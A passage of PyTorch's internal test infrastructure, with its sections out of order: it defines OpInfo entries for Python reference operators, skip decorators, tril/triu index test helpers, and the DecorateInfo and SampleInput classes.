            **kwargs):  # additional kwargs override kwargs inherited from the torch opinfo

        self.torch_opinfo_name = torch_opinfo_name
        self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name)
        assert isinstance(self.torch_opinfo, ReductionOpInfo)

        inherited = self.torch_opinfo._original_reduction_args
        ukwargs = _inherit_constructor_args(name, op, inherited, kwargs)

        # See https://github.com/pytorch/pytorch/issues/77216
        self.validate_view_consistency = False

        super().__init__(**ukwargs)

class ElementwiseUnaryPythonRefInfo(UnaryUfuncInfo):
    '''
    An OpInfo for a Python reference of an elementwise unary operation.
''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, UnaryUfuncInfo) inherited = self.torch_opinfo._original_unary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseUnaryPythonRefInfo, self).__init__(**ukwargs) class ElementwiseBinaryPythonRefInfo(BinaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise binary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, BinaryUfuncInfo) inherited = self.torch_opinfo._original_binary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseBinaryPythonRefInfo, self).__init__(**ukwargs) # Separate registry for experimental Python Reference OpInfos. python_ref_db = [ # # Elementwise Unary OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.abs", torch_opinfo_name="abs", ), ElementwiseUnaryPythonRefInfo( "_refs.acos", torch_opinfo_name="acos", ), ElementwiseUnaryPythonRefInfo( "_refs.acosh", torch_opinfo_name="acosh", ), ElementwiseUnaryPythonRefInfo( "_refs.asin", torch_opinfo_name="asin", ), ElementwiseUnaryPythonRefInfo( "_refs.atan", torch_opinfo_name="atan", ), ElementwiseUnaryPythonRefInfo( "_refs.bitwise_not", torch_opinfo_name="bitwise_not", ), ElementwiseUnaryPythonRefInfo( "_refs.ceil", torch_opinfo_name="ceil", ), ElementwiseUnaryPythonRefInfo( "_refs.cos", torch_opinfo_name="cos", ), ElementwiseUnaryPythonRefInfo( "_refs.cosh", torch_opinfo_name="cosh", ), ElementwiseUnaryPythonRefInfo( "_refs.digamma", torch_opinfo_name="digamma", ), ElementwiseUnaryPythonRefInfo( "_refs.erf", torch_opinfo_name="erf", ), ElementwiseUnaryPythonRefInfo( "_refs.erfinv", torch_opinfo_name="erfinv", ), ElementwiseUnaryPythonRefInfo( "_refs.erfc", torch_opinfo_name="erfc", ), ElementwiseUnaryPythonRefInfo( "_refs.exp", torch_opinfo_name="exp", ), ElementwiseUnaryPythonRefInfo( "_refs.expm1", torch_opinfo_name="expm1", ), ElementwiseUnaryPythonRefInfo( "_refs.exp2", torch_opinfo_name="exp2", ), ElementwiseUnaryPythonRefInfo( "_refs.fill", torch_opinfo_name="fill", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.floor", torch_opinfo_name="floor", ), ElementwiseUnaryPythonRefInfo( "_refs.frac", torch_opinfo_name="frac", ), ElementwiseUnaryPythonRefInfo( "_refs.isfinite", torch_opinfo_name="isfinite", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isinf", torch_opinfo_name="isinf", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isnan", torch_opinfo_name="isnan", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.i0", torch_opinfo_name="i0", ), ElementwiseUnaryPythonRefInfo( "_refs.lgamma", torch_opinfo_name="lgamma", ), ElementwiseUnaryPythonRefInfo( "_refs.log", torch_opinfo_name="log", ), ElementwiseUnaryPythonRefInfo( 
"_refs.log1p", torch_opinfo_name="log1p", ), ElementwiseUnaryPythonRefInfo( "_refs.log10", torch_opinfo_name="log10", ), ElementwiseUnaryPythonRefInfo( "_refs.log2", torch_opinfo_name="log2", ), ElementwiseUnaryPythonRefInfo( "_refs.nan_to_num", torch_opinfo_name="nan_to_num", ), ElementwiseUnaryPythonRefInfo( "_refs.neg", torch_opinfo_name="neg", ), ElementwiseUnaryPythonRefInfo( "_refs.positive", torch_opinfo_name="positive", ), ElementwiseUnaryPythonRefInfo( "_refs.reciprocal", torch_opinfo_name="reciprocal", ), ElementwiseUnaryPythonRefInfo( "_refs.round", torch_opinfo_name="round", ), ElementwiseUnaryPythonRefInfo( "_refs.sigmoid", torch_opinfo_name="sigmoid", # Reference: https://github.com/pytorch/pytorch/issues/56012 handles_complex_extremal_values=False, handles_large_floats=False, ), ElementwiseUnaryPythonRefInfo( "_refs.sign", torch_opinfo_name="sign", ), ElementwiseUnaryPythonRefInfo( "_refs.signbit", torch_opinfo_name="signbit", ), ElementwiseUnaryPythonRefInfo( "_refs.sin", torch_opinfo_name="sin", ), ElementwiseUnaryPythonRefInfo( "_refs.sinh", torch_opinfo_name="sinh", ), ElementwiseUnaryPythonRefInfo( "_refs.sqrt", torch_opinfo_name="sqrt", ), ElementwiseUnaryPythonRefInfo( "_refs.square", torch_opinfo_name="square", ), ElementwiseUnaryPythonRefInfo( "_refs.tan", torch_opinfo_name="tan", ), ElementwiseUnaryPythonRefInfo( "_refs.tanh", torch_opinfo_name="tanh", ), # # Elementwise Unary Special OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.special.i0e", torch_opinfo_name="special.i0e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1", torch_opinfo_name="special.i1", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1e", torch_opinfo_name="special.i1e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.logit", torch_opinfo_name="logit", ), # # Elementwise Unary nn.functional OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.celu", torch_opinfo_name="nn.functional.celu", ), PythonRefInfo( "_refs.nn.functional.dropout", torch_opinfo_name="nn.functional.dropout", decorators=( DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_view'), ) ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.elu", torch_opinfo_name="nn.functional.elu", ), PythonRefInfo( "_refs.nn.functional.leaky_relu", torch_opinfo_name="nn.functional.leaky_relu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.relu", torch_opinfo_name="nn.functional.relu", decorators=( # Need FakeTensor support for meta coverage DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta',), ), ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.mish", torch_opinfo_name="nn.functional.mish", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.selu", torch_opinfo_name="nn.functional.selu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.softplus", torch_opinfo_name="nn.functional.softplus", ), PythonRefInfo( 
"_refs.nn.functional.margin_ranking_loss", torch_opinfo_name="nn.functional.margin_ranking_loss", ), PythonRefInfo( "_refs.nn.functional.hinge_embedding_loss", torch_opinfo_name="nn.functional.hinge_embedding_loss", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.tanhshrink", torch_opinfo_name="nn.functional.tanhshrink", ), # # Elementwise Binary Reference OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.add", torch_opinfo_name="add", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.atan2", torch_opinfo_name="atan2", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_and", torch_opinfo_name="bitwise_and", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_left_shift", torch_opinfo_name="bitwise_left_shift", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_or", torch_opinfo_name="bitwise_or", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_xor", torch_opinfo_name="bitwise_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.eq", torch_opinfo_name="eq", ), ElementwiseBinaryPythonRefInfo( "_refs.float_power", torch_opinfo_name="float_power", skips=( # Test doesn't account for float -> double type promotion DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ) ), ElementwiseBinaryPythonRefInfo( "_refs.fmax", torch_opinfo_name="fmax", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmin", torch_opinfo_name="fmin", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmod", torch_opinfo_name="fmod", rhs_make_tensor_kwargs={'exclude_zero': True}, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref', dtypes=(torch.bfloat16,), device_type='cpu'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref_torch_fallback', dtypes=(torch.bfloat16,), device_type='cpu'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.ge", torch_opinfo_name="ge", ), ElementwiseBinaryPythonRefInfo( "_refs.gt", torch_opinfo_name="gt", ), ElementwiseBinaryPythonRefInfo( "_refs.igamma", torch_opinfo_name="igamma", ), ElementwiseBinaryPythonRefInfo( "_refs.igammac", torch_opinfo_name="igammac", ), ElementwiseBinaryPythonRefInfo( "_refs.isclose", torch_opinfo_name="isclose", skips=( # Intentional xfail -- isclose does not type promote DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.le", torch_opinfo_name="le", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_and", torch_opinfo_name="logical_and", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_or", torch_opinfo_name="logical_or", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_xor", torch_opinfo_name="logical_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.lt", torch_opinfo_name="lt", ), ElementwiseBinaryPythonRefInfo( "_refs.maximum", torch_opinfo_name="maximum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.minimum", torch_opinfo_name="minimum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.mul", torch_opinfo_name="mul", # 
https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.ne", torch_opinfo_name="ne", ), ElementwiseBinaryPythonRefInfo( "_refs.nextafter", torch_opinfo_name="nextafter", ), ElementwiseBinaryPythonRefInfo( "_refs.pow", torch_opinfo_name="pow", ), ElementwiseBinaryPythonRefInfo( "_refs.sub", torch_opinfo_name="sub", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.true_divide", torch_opinfo_name="true_divide", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), # # Elementwise Binary Special OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.special.zeta", torch_opinfo_name="special.zeta", supports_one_python_scalar=True, ), # # Elementwise Ternary Reference OpInfos # PythonRefInfo( "_refs.clamp", torch_opinfo_name="clamp", ), # # Data Conversion & Data Movement Opinfos # PythonRefInfo( "_refs.clone", torch_opinfo_name="clone", ), # # View & Shape OpInfos # PythonRefInfo( "_refs.atleast_1d", torch_opinfo_name="atleast_1d", ), PythonRefInfo( "_refs.atleast_2d", torch_opinfo_name="atleast_2d", ), PythonRefInfo( "_refs.atleast_3d", torch_opinfo_name="atleast_3d", ), PythonRefInfo( "_refs.as_strided", torch_opinfo_name="as_strided", # FIXME: doesn't support chalf dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # TODO: fix and/or update to xfails DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_python_ref_meta'), # cloned_mutable_input.is_same(returned_output) INTERNAL ASSERT FAILED DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_conj_view'), ), ), PythonRefInfo( "_refs.broadcast_shapes", torch_opinfo_name="broadcast_shapes", ), PythonRefInfo( "_refs.broadcast_tensors", torch_opinfo_name="broadcast_tensors", ), PythonRefInfo( "_refs.broadcast_to", torch_opinfo_name="broadcast_to", ), PythonRefInfo( "_refs.cat", torch_opinfo_name="cat", ), PythonRefInfo( "_refs.chunk", torch_opinfo_name="chunk", ), PythonRefInfo( "_refs.column_stack", torch_opinfo_name="column_stack", ), PythonRefInfo( "_refs.dsplit", torch_opinfo_name="dsplit", ), PythonRefInfo( "_refs.dstack", torch_opinfo_name="dstack", ), PythonRefInfo( "_refs.flatten", torch_opinfo_name="flatten", ), PythonRefInfo( "_refs.flip", torch_opinfo_name="flip", ), PythonRefInfo( "_refs.fliplr", torch_opinfo_name="fliplr", ), PythonRefInfo( "_refs.flipud", torch_opinfo_name="flipud", ), PythonRefInfo( "_refs.narrow", torch_opinfo_name="narrow", ), PythonRefInfo( "_refs.permute", torch_opinfo_name="permute", ), PythonRefInfo( "_refs.reshape", torch_opinfo_name="reshape", ), PythonRefInfo( "_refs.roll", torch_opinfo_name="roll", validate_view_consistency=False, ), PythonRefInfo( "_refs.rot90", torch_opinfo_name="rot90", validate_view_consistency=False, ), PythonRefInfo( "_refs.stack", torch_opinfo_name="stack", ), PythonRefInfo( "_refs.squeeze", torch_opinfo_name="squeeze", ), PythonRefInfo( "_refs.tensor_split", torch_opinfo_name="tensor_split", skips=( # TensorMeta doesn't support tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 
'test_python_ref_meta'), # RuntimeError: no _refs support for torch.Tensor.tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref'), ) ), PythonRefInfo( "_refs.transpose", torch_opinfo_name="transpose", ), PythonRefInfo( "_refs.t", torch_opinfo_name="t", ), PythonRefInfo( "_refs.unsqueeze", torch_opinfo_name="unsqueeze", ), PythonRefInfo( "_refs.view", torch_opinfo_name="view", ), # # Reduction Reference OpInfos # ReductionPythonRefInfo( "_refs.all", torch_opinfo_name="all", ), ReductionPythonRefInfo( "_refs.amax", torch_opinfo_name="amax", ), ReductionPythonRefInfo( "_refs.amin", torch_opinfo_name="amin", ), ReductionPythonRefInfo( "_refs.any", torch_opinfo_name="any", ), ReductionPythonRefInfo( "_refs.mean", torch_opinfo_name="mean", supports_out=True, ), ReductionPythonRefInfo( "_refs.std", torch_opinfo_name="std", supports_out=True ), # std_mean and var_mean are not ReductionInfos PythonRefInfo( "_refs.std_mean", torch_opinfo_name="std_mean", validate_view_consistency=False ), ReductionPythonRefInfo( "_refs.sum", torch_opinfo_name="sum", supports_out=True, ), ReductionPythonRefInfo( "_refs.prod", torch_opinfo_name="prod", supports_out=True, ), ReductionPythonRefInfo( "_refs.var", torch_opinfo_name="var", supports_out=True ), PythonRefInfo( "_refs.var_mean", torch_opinfo_name="var_mean", validate_view_consistency=False ), # # Linear Algebra Operators # PythonRefInfo( "_refs.addr", torch_opinfo_name="addr", decorators=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref',), ), ), # # Tensor Creation Reference OpInfos # PythonRefInfo( "_refs.empty", torch_opinfo_name="empty", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), PythonRefInfo( "_refs.empty_like", torch_opinfo_name="empty_like", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), # # Conditional Reference OpInfos # PythonRefInfo( "_refs.where", torch_opinfo_name="where", op=lambda self, condition, other: refs.where(condition, self, other), ), ] # Common operator groupings ops_and_refs = op_db + python_ref_db unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo)] binary_ufuncs = [op for op in op_db if isinstance(op, BinaryUfuncInfo)] binary_ufuncs_and_refs 
= tuple(op for op in ops_and_refs if isinstance(op, BinaryUfuncInfo)) spectral_funcs = [op for op in op_db if isinstance(op, SpectralFuncInfo)] sparse_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse] sparse_csr_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse_csr] sparse_reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo) and op.supports_sparse] shape_funcs = [op for op in op_db if isinstance(op, ShapeFuncInfo)] reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo)] reference_filtered_ops = [op for op in reduction_ops if op.ref not in (_NOTHING, None)] reference_masked_ops = [op for op in reference_filtered_ops if op.name.startswith('_masked.')] sparse_masked_reduction_ops = [op for op in sparse_reduction_ops if op.name.startswith('_masked.')] # TODO: review porting these to make_tensor def index_variable(shape, max_indices, device=torch.device('cpu')): if not isinstance(shape, tuple): shape = (shape,) index = torch.rand(*shape, dtype=torch.double, device=device).mul_(max_indices).floor_().long() return index def gather_variable(shape, index_dim, max_indices, duplicate=False, device=torch.device('cpu')): assert len(shape) == 2 assert index_dim < 2 batch_dim = 1 - index_dim index = torch.zeros(*shape, dtype=torch.long, device=device) for i in range(shape[index_dim]): index.select(index_dim, i).copy_( torch.randperm(max_indices, device=device)[:shape[batch_dim]]) if duplicate: index.select(batch_dim, 0).copy_(index.select(batch_dim, 1)) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.bool).bernoulli_() def mask_not_all_zeros(shape): assert len(shape) > 0 while True: result = torch.randn(shape).gt(0) if result.sum() > 0: return result # TODO: move all tri/tril/triu testing to tensor creation op test suite and remove # these from here def _compare_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): if row == 0 or col == 0: # have to handle this separately as tril and triu does not take # empty matrix as input self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) else: # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .tril(offset).nonzero().to(dtype).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) # TODO(#38095): Replace assertEqualIgnoreType. 
See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .triu(offset).nonzero().to(dtype).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) def _compare_large_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): l = torch.ones(row, col, dtype=dtype, device='cpu').tril(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.tril_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() l = torch.ones(row, col, dtype=dtype, device='cpu').triu(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.triu_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() # ( # row # col # offset (optional) # dtype (optional) # ) tri_tests_args = [ (1, 1), (3, 3), (3, 3, 1), (3, 3, 2), (3, 3, 200), (3, 3, -1), (3, 3, -2), (3, 3, -200), (0, 3, 0), (0, 3, 1), (0, 3, -1), (0, 1, 2), (1, 0, 2), (3, 0, 0), (3, 0, 1), (3, 0, -1), (0, 0, 0), (0, 0, 1), (0, 0, -1), (3, 6, 0), (3, 6, 1), (3, 6, 3), (3, 6, 9), (3, 6, -1), (3, 6, -3), (3, 6, -9), (6, 3, 0), (6, 3, 1), (6, 3, 3), (6, 3, 9), (6, 3, -1), (6, 3, -3), (6, 3, -9), (258, 253, 1, torch.float32), (257, 258, 1, torch.float64), (258, 258, 1, torch.short), (3, 513, 1, torch.long), (513, 3, 1, torch.int), (513, 0, 1, torch.double), (1024, 1024), (1024, 1024, 500, torch.float32), (1024, 1024, 1023), (1024, 1024, -500), (1023, 1025), (1025, 1023, 1022), (1024, 1024, -500), (3, 2028), (3, 2028, 1), (3, 2028, -1), (2028, 3), (2028, 1), (2028, 1, -1) ] tri_large_tests_args: List[Tuple[int, ...]] = [ # Large test cases below are deliberately commented out to speed up CI # tests and to avoid OOM error. When modifying implementations of # tril_indices and triu_indices, please enable these tests and make sure # they pass. # # (1, 268435455), # (5000, 5000), # (10000, 10000), # (268435455, 1), # (134217727, 2, 1), # (2, 134217727, 1), # (536870901, 1), # (1, 536870901), # (268435455, 2, 1), # (2, 268435455, 1) ] def run_additional_tri_tests(self, device): x = torch.ones( 3, 3, dtype=torch.long, device=device, layout=torch.strided) l = x.tril(0).nonzero().transpose(0, 1) u = x.triu(0).nonzero().transpose(0, 1) self.assertEqual(l, torch.tril_indices(3, 3, device=device)) self.assertEqual( l, torch.tril_indices(3, 3, device=device, layout=torch.strided)) self.assertEqual(u, torch.triu_indices(3, 3, device=device)) self.assertEqual( u, torch.triu_indices(3, 3, device=device, layout=torch.strided)) self.assertRaises( RuntimeError, lambda: torch.triu_indices( 1, 1, device=device, layout=torch.sparse_coo)) self.assertRaises( RuntimeError, lambda: torch.tril_indices( 1, 1, device=device, layout=torch.sparse_coo))
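# As a hedged illustration of how the tuples in tri_tests_args above are meant
# to be consumed (the real test driver lives elsewhere, so this loop is only a
# sketch; `self` and `device` are assumed to come from a device-parametrized
# test case):
#
#   for args in tri_tests_args:
#       # Each tuple unpacks as (row, col[, offset[, dtype]]); omitted items
#       # fall back to the defaults offset=0 and dtype=torch.long.
#       _compare_trilu_indices(self, *args, device=device)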
from functools import wraps, partial from itertools import product, chain, islice import itertools import collections import copy from enum import Enum import operator import random import unittest import math import torch import numpy as np from torch._six import inf import collections.abc from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union, Iterable from dataclasses import dataclass, asdict from torchgen.utils import dataclass_repr from torch.testing import make_tensor from torch.testing._internal.common_dtype import ( _dispatch_dtypes, floating_types, floating_types_and, complex_types, floating_and_complex_types, floating_and_complex_types_and, all_types_and_complex_and, all_types_and, all_types_and_complex, integral_types_and, all_types, double_types, empty_types, complex_types_and, integral_types ) from torch.testing._internal.common_device_type import \ (onlyCUDA, onlyNativeDeviceTypes, disablecuDNN, skipCUDAIfNoMagma, skipCUDAIfNoMagmaAndNoCusolver, skipCUDAIfNoCusolver, skipCPUIfNoLapack, skipCPUIfNoFFT, skipCUDAIfRocm, skipCUDAIf, precisionOverride, skipCPUIfNoMklSparse, toleranceOverride, tol, has_cusolver) from torch.testing._internal.common_cuda import ( CUDA11OrLater, SM53OrLater, SM60OrLater, with_tf32_off, TEST_CUDNN, _get_torch_cuda_version, _get_magma_version) from torch.testing._internal.common_utils import \ (is_iterable_of_tensors, random_symmetric_matrix, random_symmetric_psd_matrix, make_fullrank_matrices_with_distinct_singular_values, random_symmetric_pd_matrix, make_symmetric_matrices, make_symmetric_pd_matrices, random_square_matrix_of_rank, TEST_WITH_ROCM, IS_WINDOWS, IS_MACOS, TEST_SCIPY, torch_to_numpy_dtype_dict, TEST_WITH_ASAN, GRADCHECK_NONDET_TOL, slowTest, noncontiguous_like, freeze_rng_state) import torch.testing._internal.opinfo_helper as opinfo_helper import torch._refs as refs # noqa: F401 import torch._refs.nn.functional import torch._refs.special import torch._prims as prims # noqa: F401 from torch.utils._pytree import tree_flatten from distutils.version import LooseVersion has_scipy_fft = False if TEST_SCIPY: from scipy import stats import scipy.spatial import scipy.special try: import scipy.fft has_scipy_fft = True except ModuleNotFoundError: pass # Reasonable testing sizes for dimensions L = 20 M = 10 S = 5 # Unique value to distinguish default from anything else _NOTHING = object() class DecorateInfo(object): """Describes which test, or type of tests, should be wrapped in the given decorators when testing an operator. Any test that matches all provided arguments will be decorated. 
    The decorators will only be applied if the active_if argument is True."""

    __slots__ = ['decorators', 'cls_name', 'test_name', 'device_type', 'dtypes', 'active_if']

    def __init__(self, decorators, cls_name=None, test_name=None, *,
                 device_type=None, dtypes=None, active_if=True):
        self.decorators = list(decorators) if isinstance(decorators, collections.abc.Sequence) else [decorators]
        self.cls_name = cls_name
        self.test_name = test_name
        self.device_type = device_type
        self.dtypes = dtypes
        self.active_if = active_if

        # Validate dtypes
        if self.dtypes is not None:
            for dtype in self.dtypes:
                assert isinstance(dtype, torch.dtype)

    def is_active(self, cls_name, test_name, device_type, dtype):
        return (
            self.active_if and
            (self.cls_name is None or self.cls_name == cls_name) and
            (self.test_name is None or self.test_name == test_name) and
            (self.device_type is None or self.device_type == device_type) and
            (self.dtypes is None or dtype in self.dtypes)
        )

# FIXME
# Note: historically the 'input' kwarg had to be a Tensor or TensorList, but we are trying
# to support scalar inputs, too. Some tests still depend on 'input' being a Tensor
# or TensorList, however.
class SampleInput(object):
    """Represents sample inputs to a function."""

    __slots__ = ['input', 'args', 'kwargs', 'output_process_fn_grad', 'broadcasts_input', 'name']

    def __init__(self, input, *, args=tuple(), kwargs=None, output_process_fn_grad=lambda x: x,
                 broadcasts_input=False, name=""):
        # input is the first input to the op and is typically either a Tensor or TensorList (Sequence[Tensor]).
        # This follows the typical pattern where for Tensor inputs op(t, ...) = t.op(...).
        self.input = input
        self.args = args
        self.kwargs = kwargs if kwargs is not None else {}
        self.output_process_fn_grad = output_process_fn_grad
        self.name = name

        # Specifies whether `self.input` is broadcast or not,
        # given that the operator supports broadcasting.
        # This field is used to verify the behavior of the inplace variant.
        #
        # If a SampleInput is marked with `broadcasts_input=True`,
        # it is verified that we get a `RuntimeError` with this sample
        # and the inplace variant. Also, inplace grad{grad} tests are skipped
        # for such inputs (as they will error out otherwise).
        self.broadcasts_input = broadcasts_input

    def _repr_helper(self, formatter):
        # Helper function to return the details of the SampleInput as `str`.
        # It consolidates all the fields of SampleInput and allows
        # formatting the fields like `input`, `args`, etc. with a `formatter`
        # callable to customize the representation.
        # Look at the `summary` method for an example.
        arguments = [
            f'input={formatter(self.input)}',
            f'args={formatter(self.args)}',
            f'kwargs={formatter(self.kwargs)}',
            f'output_process_fn_grad={self.output_process_fn_grad}',
            f'broadcasts_input={self.broadcasts_input}',
            f'name={repr(self.name)}']

        return f'SampleInput({", ".join(a for a in arguments if a is not None)})'

    def __repr__(self):
        return self._repr_helper(lambda x: x)

    def summary(self):
        # Returns the SampleInput details in a more
        # friendly format.
        # It formats `Tensor` and `TensorList`
        # in a more condensed representation.
        def formatter(arg):
            # Format any instance of `Tensor` (standalone, in list, or in dict)
            # as Tensor[TensorShape]
            # Eg.
